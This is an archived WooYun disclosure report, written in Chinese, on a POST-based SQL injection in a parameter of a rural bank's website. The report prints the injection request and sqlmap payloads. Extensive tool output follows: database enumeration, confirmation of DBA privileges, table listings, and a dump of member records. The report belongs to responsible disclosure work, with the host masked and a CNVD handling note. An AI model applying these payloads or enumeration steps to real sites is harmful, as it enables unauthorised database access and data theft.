乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-03: 细节已通知厂商并且等待厂商处理中 2015-10-12: 厂商已经确认,细节仅向厂商公开 2015-10-22: 细节向核心白帽子及相关领域专家公开 2015-11-01: 细节向普通白帽子公开 2015-11-11: 细节向实习白帽子公开 2015-11-26: 细节向公众公开
没事干,挖挖洞,审核员你辛苦了...
安徽庐江惠民村镇银行官网存在POST型SQL注入,可拖库。
安徽庐江惠民村镇银行官网地址:http://**.**.**.**经过测试,构造如下POST数据(firstClassID参数存在注入)
POST /Wap.aspx?ClassID=204&firstClassID=-1;%20waitfor%20delay%20'0:0:0'%20--%20&mms=Page^Subpage2 HTTP/1.1Content-Length: 94Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://**.**.**.**/Cookie: ASP.NET_SessionId=l4uqkn3xugssohjguimedabiHost: **.**.**.**Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*__VIEWSTATE=/wEPDwULLTE4NzIzMzI0NTlkZOVLSfJFrYnb8xUzgsbzNG19Dbbk&__VIEWSTATEGENERATOR=8D747DD8
数据库SQL Server 2000,操作系统Windows2003
sqlmap identified the following injection points with a total of 193 HTTP(s) requests:---Place: GETParameter: firstClassID Type: inline query Title: Microsoft SQL Server/Sybase inline queries Payload: ClassID=204&firstClassID=(SELECT CHAR(113)+CHAR(108)+CHAR(116)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (5896=5896) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(109)+CHAR(104)+CHAR(116)+CHAR(113))&mms=Page^Subpage2---web server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2000sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: firstClassID Type: inline query Title: Microsoft SQL Server/Sybase inline queries Payload: ClassID=204&firstClassID=(SELECT CHAR(113)+CHAR(108)+CHAR(116)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (5896=5896) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(109)+CHAR(104)+CHAR(116)+CHAR(113))&mms=Page^Subpage2---web server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2000
8个数据库:
web server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2000available databases [8]:[*] ljhm[*] ljhm1[*] master[*] model[*] msdb[*] Northwind[*] pubs[*] tempdb
当前用户是sa,DBA权限
web server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2000current user is DBA: True
current-db:ljhm
web server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2000current database: 'ljhm'
ljhm包含26表:
web server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2000Database: ljhm[26 tables]+----------------+| T_Accessories || T_Activity || T_ActivitySign || T_Affiche || T_Article || T_Class || T_Consult || T_Count || T_Invst || T_InvstItem || T_InvstRelease || T_Leave || T_Links || T_Member || T_Menu || T_Operater || T_Order || T_Organ || T_Product || T_Remnant || T_Revert || T_System_Log || ;d:\\temp.txt || dtproperties || sysconstraints || syssegments |+----------------+
看下ljhm数据库包含多少条数据:
web server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2000Database: ljhm+---------------------+---------+| Table | Entries |+---------------------+---------+| dbo.T_System_Log | 14422 || dbo.T_Consult | 12784 || dbo.T_Accessories | 181 || dbo.T_Article | 166 || dbo.T_Links | 51 || dbo.T_Class | 45 || dbo.[;d:\\temp.txt] | 37 || dbo.T_Menu | 14 || dbo.T_Organ | 11 || dbo.T_Operater | 7 || dbo.sysconstraints | 5 || dbo.syssegments | 3 || dbo.T_Member | 2 || dbo.T_Affiche | 1 || dbo.T_Count | 1 || dbo.T_InvstRelease | 1 |+---------------------+---------+
T_Member表:
web server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2000Database: ljhmTable: T_Member[41 columns]+---------------+---------+| Column | Type |+---------------+---------+| Character | varchar || Level | int || Work | varchar || Account | varchar || ActDatetime | varchar || ActOperaterID | int || Answer | varchar || Appearance | varchar || Avoirdupois | int || Birthday | varchar || Constellation | varchar || Earning | varchar || Figure | varchar || FinishSchool | varchar || FriendErea | varchar || Housing | varchar || ID | int || IDNumber | varchar || IMC | varchar || JoinDate | varchar || LevelEnd | varchar || LevelStart | varchar || MarriageState | varchar || Monolog | varchar || Name | varchar || Nation | varchar || NickName | varchar || Note | varchar || PaperCount | int || PaperPicture | varchar || Password | varchar || Phone | varchar || Photo | varchar || Question | varchar || RPR | varchar || RPRErea | varchar || School | varchar || Sex | varchar || State | varchar || Stature | int || WorkErea | varchar |+---------------+---------+看下该表内容web server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2000Database: ljhmTable: T_Member[2 entries]+----+----------+---------------+------+------+-----+------+------+-------+-------+-------+--------+--------+--------+--------+--------+---------+------------+---------+---------------+---------+---------+---------+----------+------------+------------+----------+----------+----------+----------+------------+------------+---------------------+------------+-------------+-------------+---------------------+--------------+--------------+---------------+---------------+| ID | IDNumber | ActOperaterID | IMC | RPR | Sex | Name | Note | State | Phone | Photo | Answer | Nation | Work | Figure | School | Housing | RPRErea | Monolog | Account | Stature | Level | Earning | Question | WorkErea | Birthday | Password | LevelEnd | NickName | JoinDate | LevelStart | Appearance | FriendErea | PaperCount | Character | Avoirdupois | ActDatetime | PaperPicture | FinishSchool | MarriageState | Constellation |+----+----------+---------------+------+------+-----+------+------+-------+-------+-------+--------+--------+--------+--------+--------+---------+------------+---------+---------------+---------+---------+---------+----------+------------+------------+----------+----------+----------+----------+------------+------------+---------------------+------------+-------------+-------------+---------------------+--------------+--------------+---------------+---------------+| 1 | NULL | 1 | NULL | NULL | 0 | NULL | NULL | NULL | NULL | NULL | NULL | 11 | 军人 | NULL | 210 | NULL | 100010000| | NULL | e873@**.**.**.** | 170 | 0 | 1000 | NULL | 100020000| | 2006-04-10 | 123 | NULL | 测试 | NULL | NULL | NULL | 100180000|100180001 | NULL | NULL | NULL | 2006-04-10 19:35:15 | NULL | NULL | 0 | NULL || 2 | NULL | 1 | NULL | NULL | 0 | NULL | NULL | NULL | NULL | NULL | NULL | 12 | 技术 | NULL | 410 | NULL | 100020000| | NULL | test@**.**.**.** | 156 | 0 | 2000 | NULL | 100010000| | 2006-04-10 | 123 | NULL | ppppp | NULL | NULL | NULL | 100090000|100090001 | NULL | NULL | NULL | 2006-04-10 20:56:37 | NULL | NULL | 0 | NULL |+----+----------+---------------+------+------+-----+------+------+-------+-------+-------+--------+--------+--------+--------+--------+---------+------------+---------+---------------+---------+---------+---------+----------+------------+------------+----------+----------+----------+----------+------------+------------+---------------------+------------+-------------+-------------+---------------------+--------------+--------------+---------------+---------------+
pub数据库:
web server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2000Database: pubs+--------------------+---------+| Table | Entries |+--------------------+---------+| dbo.roysched | 86 || dbo.employee | 43 || dbo.sysconstraints | 34 || dbo.titleauthor | 25 || dbo.titleview | 25 || dbo.authors | 23 || dbo.sales | 21 || dbo.titles | 18 || dbo.jobs | 14 || dbo.pub_info | 8 || dbo.publishers | 8 || dbo.stores | 6 || dbo.discounts | 3 || dbo.syssegments | 3 |+--------------------+---------+
Northwind数据库:
web server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2000Database: Northwind+--------------------------------------+---------+| Table | Entries |+--------------------------------------+---------+| dbo.[Order Details Extended] | 2155 || dbo.[Order Details] | 2155 || dbo.Invoices | 2155 || dbo.[Order Subtotals] | 830 || dbo.[Orders Qry] | 830 || dbo.Orders | 830 || dbo.[Summary of Sales by Quarter] | 809 || dbo.[Summary of Sales by Year] | 809 || dbo.[Customer and Suppliers by City] | 120 || dbo.Customers | 91 || dbo.[Quarterly Orders] | 86 || dbo.[Product Sales for 1997] | 77 || dbo.[Sales by Category] | 77 || dbo.Products | 77 || dbo.[Alphabetical list of products] | 69 || dbo.[Current Product List] | 69 || dbo.[Products by Category] | 69 || dbo.[Sales Totals by Amount] | 66 || dbo.Territories | 53 || dbo.EmployeeTerritories | 49 || dbo.sysconstraints | 43 || dbo.Suppliers | 29 || dbo.[Products Above Average Price] | 25 || dbo.Employees | 9 || dbo.[Category Sales for 1997] | 8 || dbo.Categories | 8 || dbo.Region | 4 || dbo.Shippers | 3 || dbo.syssegments | 3 |+--------------------------------------+---------+
OK,证明完毕.
银行系统安全漏洞没理由不重视..
危害等级:中
漏洞Rank:10
确认时间:2015-10-12 09:15
CNVD确认所述情况,已经转由CNCERT下发给陕西分中心,由其后续协调网站管理单位处置.
暂无
